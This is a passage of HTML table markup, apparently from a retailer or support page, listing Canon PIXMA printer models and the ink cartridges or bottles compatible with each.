width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment 